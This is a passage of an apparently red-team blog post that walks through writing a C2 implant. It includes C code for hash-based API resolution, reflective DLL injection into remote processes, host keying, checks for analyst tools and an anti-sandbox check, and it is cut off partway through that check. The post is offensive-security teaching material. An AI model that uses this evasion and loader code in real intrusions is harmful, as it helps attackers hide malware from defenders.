Links

Maelstrom #4: Writing a C2 Implant

In this blog, we will discuss how to write a C2 implant for the modern era. We will look at the history of offensive techniques and the progress of defence.

Introduction

In the series so far, we have discussed the purpose and intentions behind a C2, and the design considerations for both the implant and server.
In this post, we will move beyond this theoretical discussion and begin building a basic implant. We'll start by looking at the evolution of offensive and defensive techniques since 2010, to give us context and understanding of the current landscape. We'll then, as with our previous posts, discuss some important concepts that we'll be incorporating into the implant. Finally, we'll walk through the implant design, writing the base of both stage0 and stage1 of the implant for our exemplar C2, Maelstrom.
When discussing C2 implants, people often say that their implant is fully undetectable (ironically, "FUD"). A newly written implant, which hasn't been seen before, will be undetectable as it has not been seen before. Therefore, on disk, and potentially even when run, it won't be flagged. However, this doesn't account for runtime detections, telemetry generated by Windows, or the various methods of reputation ranking used by a modern day endpoint detection.
In 2022, not all companies have yet implemented all the protections that are available to them, including a full SIEM with comprehensive event logging, or even an EDR agent on every device. This can give the impression that steps like we will discuss in this post are not required, but that is simply a result of not having yet met an environment with anything more than Defender. The days of running commands via a command interpreter are long gone:
public void ExecuteCommand(String command)
{
Process p = new Process();
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/c " + command; // cmd.exe spesific implementation
p.StartInfo = startInfo;
p.Start();
}

Objectives

This post will cover:
  • The background and development of offensive and defensive techniques around implants.
  • The functions and code required for a contempory Stage 0, including:
    • Environmental Keying
    • Detecting Suspicious Processes
    • Anti-Sandbox Protections
    • Anti-Debug Protections
  • The functions and code required for a contemporary Stage 1, including:
    • Reflective Loading
    • DLL Debugging
    • Server Checkins
    • Sleeping
From this point, we will have an implant which can manage basic checkins, and which can be augmented with more sophisticated functionality evasive techniques, and other opsec features. We will explore these in later blogs, but for further information on evasive techniques, Check Point Research: Evasion techniques can be used as a reference.
As we've mentioned in a similar paragraph in every blog post so far, and will continue mentioning in every post so far but after, the code will serve to illustrate the functionality, but is far from being immediately usable within a functional C2.
Stage 0:
  • Environmental Keying
  • Detecting Suspicious Processes
  • Anti-Sandbox
  • Anti-Debug
Stage 1:
  • Checking-in to the server
For further information on evasive techniques, Check Point Research: Evasion techniques can be used as a reference.

Evolution of Offensive and Defensive Techniques

Over the years, code execution has gotten more and more complicated as defensive techniques and processes, improved requiring more sophisticated approaches. In this section, we want to just nail down the evolution and history of both offence and defence within this space. By doing so, we hope to build an understanding of why some behaviours are absolutely necessary in today's red team environment.
While some implants may be anti-virus proof, able to run without detection and execute commands within a system, this is a far cry from being able to operate as a viable C2 within a network with an up-to-date EDR and a correctly configured SIEM. Indeed, without these actions in place, a red team is likely to not provide value to an organisation as many of the recommendations will simply be unapplicable to a network with that level of maturity.

2010s

Back in the day when Metasploit was king, it would be possible to get away with running commands from the shell. Meaning the implant.exe running on the host would call cmd.exe, and then the command wrapped within the /c flag. This would produce the following process tree:
-> implant.exe
-> cmd.exe
-> whoami.exe
This is all fine when runtime rules are not being executed on specific behaviour. Also around this time, we had one-shot-kill exploits such as MS08-67 which would essentially work as a point-and-click exploit giving NT AUTHORITY/SYSTEM access.
Obviously we cannot speak for every Anti-Virus vendor, but around this time almost all detections were performed on static analysis and required malware families to be known. This is still partially the case in modern day with static detection, however now there is a lot of crowdsourcing with companies such as Virus Total, and the adaption of Machine Learning - as seen in Intercept X: Powered by Deep Learning.

2014 - 2016

From the cmd.exe phase, the community went into a very PowerShell oriented style. This spawned projects like Empire in 2016 which was the first Command and Control (C2) Framework which was written entirely in PowerShell. Around the same time, the original PoshC2 was produced. At the time, PowerShell was working well. Around the same time, Antimalware Scan Interface (AMSI) was picking up. From This is how attackers bypass Microsoft's AMSI anti-malware scanning protection, the release appears to be 2015. At the time, and still somewhat to this day, AMSI has been trivial to bypass. Because of this, websites such as amsi.fail were created to generate obfuscated AMSI Bypasses from the following sources:
Also, around 2016, Invoke-Obfuscation was produced to severely obfuscate PowerShell. Later, in 2016, Raphael Mudge wrote Modern Defenses and YOU!. This blog post details why operators should move away from PowerShell due to its popularity. This was reinforced by Microsoft in 2017 when they released Defending Against PowerShell Attacks and then a tweet from Matt Graeber which alludes to PowerShell being too popular and the new technique being .NET .
Whilst all this was going on, every aspect of offensive PowerShell required was built into one suite: PowerSploit.
Cobalt Strike 3.11 - The snake that eats its tail introduces execute-assembly which would dictate the next few years...
Around time time in the Defensive component of the industry, Anti-Virus vendors were making a migration into the detection and mitigation of Zero Day Exploits due to an increase in the usage of these from APTs, a portion of which were attributed to Chinese Military Groups.
Over this period of time, we saw the rise of companies such as CrowdStrike, SentinelOne, Cylance and a few others. We do not know the internals of these companies and how/when/why they started implemented their in-memory and technique based detections. But this period of time is likely where techniques such as Userland Hooking, registering Kernel Callback's to determine suspicious behaviour and then the introduction of languages such as Lua to write rules to parse the logs generated by such protections. Using Lua in such a way is a known use case of Microsoft Defender for Endpoint (MDE) and has been extracted by researchers, as seen in ExtractedDefender.

2017 - 2019

When Cobalt Strike introduced execute-assembly, the usage of .NET exploded and is still somewhat popular today. Projects like SharpCollection were created to build nightly releases of a bunch of tools, but this doesn't touch the surface on the attack tools throughout the internet. Around this time, Covenant was the first C2 to popularize .NET as a C2 Framework.
Likely due to this popularity, Microsoft added backwards compatibility and general support for AMSI. In Whats new in .NET 4.8:
Antimalware scanning for all assemblies. In previous versions of .NET Framework, the runtime scans all assemblies loaded from disk using either Windows Defender or third-party antimalware software. However, assemblies loaded from other sources, such as by the [Assembly.Load(Byte])) method, are not scanned and can potentially contain undetected malware. Starting with .NET Framework 4.8 running on Windows 10, the runtime triggers a scan by antimalware solutions that implement the Antimalware Scan Interface (AMSI).
At the time, it received some praise online. This would be trivial to handle by heavily obfuscating the assembly, or creating .NET Loaders to encrypt and reflect the malicious tool with Assembly.Load. Dom Chell did a great talk on this in 2020: Dominic Chell - Offensive Development: Post Exploitation Tradecraft in an EDR World.
Similarly to PowerShell, SharpSploit was produced solving a huge portion of offensive requirements. An argument can be made that when a full attack suite for a given language is developed, it could be the end of an era for that language.
It was around 2019/2020 where the community began experimenting with things like Nim and Dynamic Language Runtime Overview (DLR) with projects such as SILENTTRINITY and OffensiveDLR.

2019 - 2020

Like execute-assembly, Cobalt Strike somewhat changed the typical tooling approach by introducing inline-execute in Cobalt Strike 4.0 – Bring Your Own Weaponization:
Finally, Cobalt Strike 4.0 introduces an internal inline-execute post-exploitation pattern. Inline-execute passes a capability to Beacon as needed, executes it inline, and cleans up the capability after it ran. This post-exploitation interface paves the way for future features that execute within Beacon’s process context without bloating the agent itself.
Along with inline-execute, Cobalt Strike introduced the idea of Beacon Object Files:
A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features.
Essentially, they are just specifically crafted Common Object File Format (COFF) Files. The benefit, as TrusedSec point out in A Developer’s Introduction To Beacon Object Files, is that the operator benefits from running code inside of beacon process itself, avoiding creating a child process which is something that the in-built execute-assembly suffers from.
TrustedSec then went onto produce:
Around the same time, people began reinterpreting the execute-assembly function by rewriting the CLR and executing it as a RDLL:
With this heavy investment in rewriting key parts of Cobalt Strike, the stream of new C2s became a torrent. While custom C2 development had always been a part of the industry, Cobalt Strike's off-the-shelf nature and market dominance seemed to eclipse much of this activity. However, from 2019 onwards, more and more courses and blogs endorsed the concept of custom C2 authorship as a viable alternative to a commercial C2, or even as a straightforward learning exercise.

2022

Cobalt Strike for many years, in our experience at any rate, was the C2. Even with the growth of other C2s, Cobalt Strike remains the C2 that C2s are compared to, the Sennheiser HD600's of the offensive tools. Cobalt Strike's interface and operation (and Armitage before it) remain "what a C2 looks like", at least in our minds. Although we've not seen many imitate the device canvas (or, sadly, the lightning).
While there are arguments to be made for other projects, Cobalt Strike has been steering the industry, for both Offence and Defence, for years. The frequent and information dense blogs and videos helped both offensive and defensive teams improve their techniques in a way that few other vendors have done.
Raphael Mudge's video playlists:
Then then entire blog: Cobalt Strike: Blog
Researchers worked on "How to improve X in Cobalt Strike" for a long time, and the change to actually building new and unique tooling has only shifted over the past few years. For defensive teams, Cobalt Strike is still frequently seen and will be for a while. This comes from its leaks and cracks over the years and its continued effectiveness.
Since Raphael Mudge stepped down from the team, Help Systems have been primarily working on stability which has given detection a lot of time to catch-up. Due to this, the detection rate for Cobalt Strike both on disk, and in memory, have drastically increased. Obviously, Cobalt Strike remains a completely viable and good option for a C2, but the industry has started to see some titans emerge to rival Cobalt Strike.
In response, in recent posts Cobalt Strike has begun to discuss working on more evasive features, such as: Arsenal Kit Update: Thread Stack Spoofing. The Cobalt Strike Roadmap Update discusses this further, mapping their future progression.
As Raphael Mudge took his foot off the gas and the research efforts slowed down, it caused the industry to begin building out their own tooling to reduce the amount of signatures that they would have to deal with. As more and more people began building these tools, the C2 Matrix began in order to track them. However, there are two titans who are at the forefront of advanced functionality:
Both of these offer advanced evasive technology baked into the product, and are aimed at working in sophisticated environments with high levels of protection in place.
By writing an entirely new C2 from scratch, if gives the operators full control of the implant and communications. For example, as the use of memory sweeps becomes more common, it may be a requirement to fluctuate the page permissions of the memory region in which the implant is operating out of. If the operator is using Cobalt Strike, then something like ShellcodeFluctuation could be used. The issue here is that its an extra piece of shellcode to execute, and it places a hook on the KERNEL32!Sleep function, increasing the indicators of compromise. Whereas the the C2 was completely open to the operators, then this could just be a setting to enable and disable on a per-implant basis.
When it comes to modern day defences, its a continuation of the things we've recently discussed. However, the internals of these techniques have gone through endless amount of research and development to better empower the techniques. We've also seen the introduction of feeds into Event Tracing for Windows (ETW) for Threat Intelligence known as ETWTi, more on this in Introduction to Threat Intelligence ETW. As well as ingesting ETWTi feeds, more generic ETW feeds have seen use. For example, the usage of the DotNet Runtime traces to determine assemblies being loaded.
In the next two blogs, we will look at implementing a few of these techniques. Namely, ETWTi, Userland hooks, ETW, AMSI and memory sweeps.

Important Concepts

In this section, we want to outline a few topics that will come up when building out the implant so that they make sense and we can demonstrate the implant effectively.

OS Shell Commands

When discussing OS Shell Commands, we don't mean just cmd.exe. This is anything that causes a a child process to spawn to run the command, every language has its equivalent. To name a few:
We've mentioned it a few times now, but lets look at why running post exploitation under cmd.exe is a bad idea. In a more traditional environment, running commands directly on a host may be considered normal behaviour for an operator. However, as we've explored, the level of detections and awareness that an operator can expect within a contemporary environment is far higher. Advances in logging, especially within Windows, as well as a greater awareness of which events to pay attention to, as well as EDR and intermediary security devices have resulted in a state of play where directly running commands can worst case be immediately considered an indicator of compromise, and best case a highly suspicious activity as can be seen by the fact it has a formal MITRE ATT&CK reference as: Command and Scripting Interpreter (T1059).
While LOLBINs and aliases still have a role to play, using these for downloads and command execution is an exercise in operational security by obscurity. Techniques relying on increasingly more unknown Windows built-ins can be quickly neutralised with a simple blocklist. This may be by reimplementing the logic within the implant, or by finding the base functions that the commands themselves use and calling them directly, bypassing any calls to run commands via cmd.exe.
Fundamentally Windows cannot block the features that Windows itself has to use. Since these calls are so ubiquitous, since every feature in Windows makes use of these, they are now reliant on EDR using hooks and callbacks.
Overall, there are more ways to reimplement and refactor code with the WinAPI than there will be to execute commands via OS-based command execution or random LOLBINs. This is something that Cobalt Strike documented: OPSEC Considerations for Beacon Commands.

WinAPI

The WinAPI are functions that are exported from various DLLs, most of which can be seen in c:\windows\system32, and they give access to all different components of Windows. Its utility is far too comprehensive to discuss, but here is an example. Within Kernel32.dll theres a function called VirtualAlloc:
LPVOID VirtualAlloc(
[in, optional] LPVOID lpAddress,
[in] SIZE_T dwSize,
[in] DWORD flAllocationType,
[in] DWORD flProtect
);
And for the most part, these APIs are documented on MSDN. As these functions are written by Microsoft, and marked as proprietary, projects such as ReactOS attempt at recreating this. So, when we get discuss Userland Hooks and such in future blogs, we will also discuss how and why reimplementing the function, without using the function, will typically avoid specific detections.
For now, though, the WINAPI is giving us access to calls that will make this entire process easier.

Process Environment Block

Windows is an Object Oriented Operating System. Meaning, everything operated is an object and will have some form of data structure. Processes fall into this category. A Process, like calc.exe, has an object called Process Environment Block (PEB) which contains all sorts of information:
  • Process Name
  • Location
  • Is it being debugged
  • Loaded modules
  • Environment Path
  • Etc
This is all stored in a structure like so:
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID Reserved4[3];
PVOID AtlThunkSListPtr;
PVOID Reserved5;
ULONG Reserved6;
PVOID Reserved7;
ULONG Reserved8;
ULONG AtlThunkSListPtr32;
PVOID Reserved9[45];
BYTE Reserved10[96];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved11[128];
PVOID Reserved12[1];
ULONG SessionId;
} PEB, *PPEB;
Throughout this blog, we will interact with the PEB a lot, mainly to get enumerate loaded modules and such. As this is a pretty extensive topic, we won't discuss it all and have some recommended reads. But for now, know the PEB as the structure in which the process is build upon.

Position Independent Code

When we talk about Position Independent Code, we are talking about C code that is written in a very specific way, with additional restrictions. The goal is to have all the code we plan to execute inside the .text section of the PE.
Writing C normally will cause different parts of the code to be stored in different sections:
  • Global Variables in .bss
  • Imported DLLs in .idata
  • Exports in .data
  • CHAR* and WCHAR* in .rdata
Even with all those limitations, we can still achieve our goal. We just need to write code in a very specific way to avoid these different section allocations. By doing so, we ensure all the code is in the .text section. We need this because that is the section required for storing all of the binary code. If part of the code is in .bss, then it will crash because we're only going to extract the .text.
For example, lets assume this string:
const char* String = "hello world";
Because this is read-only initialised data, it goes into .rdata. To get this to be PIC, we write it as such:
char String[] = {'a', 'b', 'c', 0};
What if we want to use VirtualAlloc? If its just called as is, then it will have Kernel32 as an import. To get around this, we will need to dynamically load the DLL, and then resolve the address (more on this later).
One final note, to ensure we don't have CRT controlling the execution flow of the PE, we need to make sure that the entry-point is not main or some other form of winmain, wmain, etc. We will show this later on in the Makefile.

Supporting Post Exploitation

When discussing implants, there are several methods of supporting post explotation utilities. For the most part, implants will have a majority of their functionality embedded in the implant. So, when the implant recieves a command, the command will go through some sort of switch statement:
switch(job):
case 1:
whoami();
break;
case 2:
hostname();
break;
Alternatively, the implant could work as a loader; supporting:
This ensures that the actual implant is significantly smaller, and all functionality is modular. However, this comes at the cost of constant memory allocations for each job. The method chosen is entirely defendant on the use case, but we should it will be addressed. For us, we will stick the the traditional all functionality embedded variant.

Types of implants

If the implant is to be .NET, then a simple assembly that's dynamically loaded is fine. However, this is not the type of implant we are discussing. For an implant written in C(++) there are some options on the type of implant to use.
Position Independent
The implant could quite well be Position Independent and the entry point could be resolved, this is seen in SleepyCrypt where the functionality is allocated with VirtualAlloc and casted to a function, like so:
// Copy the shellcode into it.
memcpy( pBuffer, shellcode_bin, shellcode_bin_len );
// Make a function pointer to the run function shellcode.
fprun Run = ( fprun )pBuffer;
Dynamic Link Library
More commonly, the implant could be written as a Dynamic Link Library (DLL). DLLs are typically loaded with LoadLibraryA:
HMODULE hModule = LoadLibraryA("c:\\implant.dll");
The issue here is that LoadLibraryA requires the DLL to be on disk which would break the golden rule of OpSec: Don't write to disk. Doing so will leave artifacts behind, allowing for the implant to be signatured, resulting in more time on trying to break the signature.
The Golden Rule of OpSec: Don't write to disk!*
* Unless you need to, or unless you know how to avoid the detection, or... except... and... ... other caveats
Reflective DLLs
This led to a technique known as Reflective DLLs (RDLL), first produced by Stephen Fewer around 11 years ago. The ReflectiveDLLInjection repository contains the original code. Since then, the technique has been updated, but lets discuss the original. The description:
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
Essentially whats going to happen is the RDLL will be allocated similarly to typical shellcode:
However, before the thread is created, the Relative Virtual Address (RVA) is calculated by searching the Process Environment Block (PEB) for the Export Directory, and then all the exports to identify the RDLLs Export (which is simply a function exposed from the DLL).
See also: The .edata Section, more on the PEB structure later.
Once the exported address has been found, the offset is added to the base address of the allocated space for the RDLL. Like so:
LPVOID lpBuffer = NULL /* This will be the buffer containing the RDLL */;
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
  • First off, lpBuffer can be from anywhere; downloaded from the internet, read from a file, etc. For an implant, its likely downloaded over some sort of channel (HTTP).
  • With the buffer, it is then cycled through to find the RVA of the exported function.
  • Now that the offset is determined, and stored in dwReflectiveLoaderOffset, lpRemoteLibraryBuffer will be the base address returned from VirtualAllocEx.
  • The space is allocated, and the export offset found, they can be added together to get the address of the exported function.
All that needs to happen now is for the thread to be created at this point to execute the loader:
hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
All of this can be seen in LoadRemoteLibraryR from the repository.
The exported function can be seen in the DLLEXPORT of ReflectiveLoader; this is the function the thread triggers on. The code is well documented, so we will not discuss the codebase.
There are some issues with RDLLs, and we will discuss them in the future post in which we perform a static/runtime analysis of the implant. For defenders, make sure there is a signature for the this technique and ensure the ReflectiveLoader string is treated as malicious as seen on alienvault.com:
import "pe"
rule ReflectiveLoader
{
meta: description = "Detects a unspecified hack tool, crack or malware using a reflective loader no hard match further investigation recommended"
reference = "Internal Research"
score = 60
strings:
$s1 = "ReflectiveLoader" fullword ascii
$s2 = "ReflectivLoader.dll" fullword ascii
$s3 = "?ReflectiveLoader@@" ascii
condition:
uint16(0) == 0x5a4d and ( 1 of them or pe.exports("ReflectiveLoader") or pe.exports("_ReflectiveLoader@4") or pe.exports("?ReflectiveLoader@@YGKPAX@Z") )
}
This is the technique we will follow for Maelstrom.

Recap of the Execution Flow

During Maelstrom: The C2 Architecture we discussed the execution flow that the implant will take:
  • Stage 0: A Position Independent Loader
  • Stage 1: Reflective DLL
By making the stage 0 loader PIC, we can wrap it into any other form of loader required. Once the Stage 0 executes, it will load a Reflective DLL which will be the main implant (Stage 1).
Simple.

Stage 0

Maelstrom WinAPI Resolution

Before getting into the stager, we need to cover how Maelstrom resolves WinAPI functions. In order to keep our actual C2s functionality somewhat guarded, we're opting to use publicly accessible code throughout this series. One solution is paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h, and an alternative could be: Speedi13/Custom-GetProcAddress-and-GetModuleHandle-and-more/blob/master/CustomWinApi.cpp#L168.
Parsing the PEB is not a difficult task, and it is all over the internet. CAPA even has rules for this. The function from Paranoid Ninja's example:
FARPROC GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
UINT64 uiModuleAddress = (UINT64)hModule;
UINT64 uiSymbolAddress = 0;
UINT64 uiExportedAddressTable = 0;
UINT64 uiNamePointerTable = 0;
UINT64 uiOrdinalTable = 0;
if (hModule == NULL) {
return 0;
}
PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);
uiExportedAddressTable = (uiModuleAddress + ExportDir->AddressOfFunctions);
uiNamePointerTable = (uiModuleAddress + ExportDir->AddressOfNames);
uiOrdinalTable = (uiModuleAddress + ExportDir->AddressOfNameOrdinals);
if (((UINT64)lpProcName & 0xFFFF0000) == 0x00000000) {
uiExportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - ExportDir->Base) * sizeof(DWORD));
uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
}
else {
DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
break;
}
uiNamePointerTable += sizeof(DWORD);
uiOrdinalTable += sizeof(WORD);
}
}
return (FARPROC)uiSymbolAddress;
}
First, pass in a module base address and cast it to uiModuleAddress:
UINT64 uiModuleAddress = (UINT64)hModule;
This is the used to identify the Export Directory, again, this is a standard technique:
PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);
Get the offset of the NT Headers by adding the base address and offsetting it with the DOS Headers to give the e_lfanew. Then, using that value, extract the Data Directory struct. Finally, specifically get the Export Directory by offsetting the module base with the data directories virtual address. Now access to the Export Directory has been achieved.
Now it is just a case of looping through all the exported functions from that directory until the strings match:
DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
break;
}
uiNamePointerTable += sizeof(DWORD);
uiOrdinalTable += sizeof(WORD);
}
As strcmp cannot be used without resolving it... its easier to just get the source code:
int STRCMP(const char* p1, const char* p2)
{
const unsigned char* s1 = (const unsigned char*)p1;
const unsigned char* s2 = (const unsigned char*)p2;
unsigned char c1, c2;
do
{
c1 = (unsigned char)*s1++;
c2 = (unsigned char)*s2++;
if (c1 == '\0')
return c1 - c2;
} while (c1 == c2);
return c1 - c2;
}
void* MEMSET2(void* dest, int val, size_t len)
{
unsigned char* ptr = dest;
while (len-- > 0)
*ptr++ = val;
return dest;
}
When STRCMP matches, we return the symbolAddress after the break:
return (FARPROC)uiSymbolAddress;
So where is the module base address coming from? Well:
LPVOID GetKernel32() {
LPVOID pKernel32Dll = NULL;
pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH1);
if (NULL == pKernel32Dll) {
pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH2);
if (NULL == pKernel32Dll) {
pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH3);
if (NULL == pKernel32Dll) {
return NULL;
}
}
}
return pKernel32Dll;
}
Three DJB2 hashes are defined:
#define KERNEL32DLL_HASH1 0xa709e74f /// Hash of KERNEL32.DLL
#define KERNEL32DLL_HASH2 0xa96f406f /// Hash of kernel32.dll
#define KERNEL32DLL_HASH3 0x8b03944f /// Hash of Kernel32.dll
Then, parsing the PEB we can obtain the DLLBase:
LPVOID GetModuleByHash(UINT uiModuleHash) {
PEB* peb = (PEB*)PPEB_PTR;
if (NULL == peb) {
return NULL;
}
PEB_LDR_DATA* pLdr = peb->Ldr;
LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;
for (pListEntry = pListHead->Flink; pListEntry != pListHead; pListEntry = pListEntry->Flink) {
pLdrEntry = (LDR_DATA_TABLE_ENTRY_COMPLETED*)((PCHAR)pListEntry - sizeof(LIST_ENTRY));
WCHAR* pwDllName = pLdrEntry->BaseDllName.Buffer;
UINT wHash = Djb2HashW(pwDllName);
if (wHash == uiModuleHash) {
return pLdrEntry->DllBase;
}
}
return NULL;
}
First off, get the PEB Struct:
PEB* peb = (PEB*)PPEB_PTR;
Where PPEB_PTR is:
#define PPEB_PTR __readgsqword(0x60)
Read from the offset of 0x60 gives access to the PEB. Next, we can get the PEB_LDR_DATA struct by simply accessing it:
PEB_LDR_DATA* pLdr = peb->Ldr;
Then get access to the module list:
LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;
As seen in the struct:
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
Then loop over it until the hashes match. When they do, that will be the DLL required.
Now its a case of casting to the function type, but before that; here is how the APIs are stored:
typedef struct API_ {
LPVOID LoadLibraryA;
LPVOID CloseHandle;
LPVOID GlobalMemoryStatusEx;
LPVOID CreateToolhelp32Snapshot;
LPVOID Process32NextW;
LPVOID Process32FirstW;
LPVOID GetComputerNameW;
LPVOID Sleep;
LPVOID WinHttpCloseHandle;
LPVOID WinHttpQueryDataAvailable;
LPVOID WinHttpQueryHeaders;
LPVOID WinHttpReadData;
LPVOID WinHttpReceiveResponse;
LPVOID WinHttpSendRequest;
LPVOID WinHttpSetOption;
LPVOID WinHttpConnect;
LPVOID WinHttpOpen;
LPVOID WinHttpOpenRequest;
LPVOID WinHttpAddRequestHeaders;
LPVOID GlobalFree;
LPVOID malloc;
LPVOID free;
LPVOID memset;
LPVOID VirtualProtect;
LPVOID VirtualAlloc;
LPVOID CreateThread;
LPVOID WaitForSingleObject;
LPVOID VirtualFree;
}
API, * PAPI;
In the case of LoadLibraryA:
typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR lpLibFileName);
CHAR cLoadLibraryA[13] = { 'L', 'o', 'a', 'd','L','i','b','r','a','r','y','A',0 };
Api->LoadLibraryA = GetSymbolAddress(hKernel32, cLoadLibraryA);
Then using it:
CHAR cWinHTTP[8] = { 'w','i','n','h','t','t','p',0 };
HMODULE hWinHttp = ((LOADLIBRARYA)api.LoadLibraryA)(cWinHTTP);
Now onto the stager!
Quick recap of Stage 0. Before running malicious code on a host to get an implant, some initial enumeration and checks are going to be put into place. For an Adversary Simulation exercise, this keeps the attackers within scope, whilst also ensuring that the implant is only executed when it is safe to do so.
Additionally, this entry point will all be Position Independent; meaning that all of the code will be within the .text section, allowing for the opcodes to be extracted, thus giving shellcode to execute in other methods.
Note, Position Independent Code will not be discussed at length within this post, it is recommended to read Executing Position Independent Shellcode from Object Files in Memory.

Functionality

In this section, we want to discuss some functionality that can be added to a stage 0. Obviously, it doesn't need to ALL go in, but its just some things we found interesting and/or useful.
Environmental Keying
First up, Environmental Keying, or Guardrailing. This has two purposes:
  • If the Environmental information embedded in the stager does not match what was enumerated, then return.
  • Encrypt the stage 1 DLL with some information obtained from the environment, and decrypt it at runtime.
The second point can be completely automated, this is not something done in Maelstrom, but it easy to send some information back to the C2, and then encrypt the DLL with that information before returning it to the stager.
As far as methods of doing this, there are a ton and quite frankly its down to creativity. A few examples can be shown here:
An even easier method is use something like GetComputerNameW or GetUserNameW. This is pretty basic and a combination of these types of calls could be used.
In the case of Maelstrom, we simply hash the computername and check it with this function:
BOOL IsCorrectEnvironment(API api) {
WCHAR wHostname[MAX_COMPUTERNAME_LENGTH];
DWORD dwSz = sizeof wHostname;
if (((GETCOMPUTERNAMEW)api.GetComputerNameW)(wHostname, &dwSz)) {
if (Djb2HashW(wHostname) == HOSTNAME_HASH) {
return TRUE;
}
}
return FALSE;
}
Which is called like so:
if (IsCorrectEnvironment(Api) == FALSE) {
return FALSE;
}
To AES256 encrypt a payload using this technique, it can be read in Greta: Windows Crypto, and Recursive Keying. Maelstrom will not make use of this as this is purely a Proof-of-concept.
So, back to the keying. If the computername doesnt match, then it returns -1 and will exit. Otherwise, it moves on.
Detecting Suspicious Processes
This is a fun one, it adds an extra layer of hindering blue teams. Its quite simple, if a process is found, exit. In the following example only one process is being checked for, but its not an extra issue to loop over a bunch:
BOOL AreSuspiciousProcessesRunning(API Api) {
HANDLE hSnapshot;
PROCESSENTRY32W pe32;
hSnapshot = ((CREATETOOLHELP32SNAPSHOT)Api.CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return FALSE;
}
pe32.dwSize = sizeof(PROCESSENTRY32W);
if (!((PROCESS32FIRSTW)Api.Process32FirstW)(hSnapshot, &pe32)) return FALSE;
do {
if (Djb2HashW(pe32.szExeFile) == PROCESS_HACKER_HASH) {
return TRUE;
}
} while (((PROCESS32NEXTW)Api.Process32NextW)(hSnapshot, &pe32));
((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
return FALSE;
}
Loop over all processes, if the hashed value of process is the same as the one defined, then return TRUE. In this case, it is Process Hacker.exe:
#define PROCESS_HACKER_HASH 0xda24bd3c
This is executed like so:
if (AreSuspiciousProcessesRunning(Api)) {
return FALSE;
}
Anti-Sandbox
Sandboxes are a great way to automate and identify what the purpose of malware is. Essentially, they run malware inside an isolated virtual machine, watch its behaviour, report on it.
Commonly, these are small virtual machines with a limited amount of time they can wait. Some common solutions to handling sandboxes:
  • Waiting for the expiration time (usually 180 seconds)
  • Only executing if not in a virtual machine
  • Only executing if a disk size is above a certain threshold
They are just a few to consider, in the case of maelstrom we simply check RAM size > 4:
BOOL IsInSandbox(API Api) {
MEMORYSTATUSEX memStatus;
memStatus.dwLength = sizeof(memStatus);
